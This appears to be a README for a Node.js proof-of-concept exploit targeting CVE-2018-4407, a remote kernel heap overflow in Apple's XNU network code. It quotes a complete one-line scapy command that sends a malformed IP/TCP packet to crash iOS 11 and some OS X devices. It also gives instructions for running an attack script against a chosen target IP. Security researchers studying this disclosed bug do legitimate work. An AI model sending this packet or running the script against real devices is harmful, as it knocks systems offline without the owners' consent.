node-cve-2018-4407
Node.js PoC exploit code for CVE-2018-4407
Author: Sam Decrock
This script is based on the scapy script provided by Zuk:
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:
— Zuk (@ihackbanme) November 1, 2018
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
It crashes devices with iOS 11 or earlier as well as some versions of OS X.
Install modules
To install its required modules, run:
npm install
Run
To run, pass the target IP address as an argument:
node attack.js 192.168.1.20
More information
Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407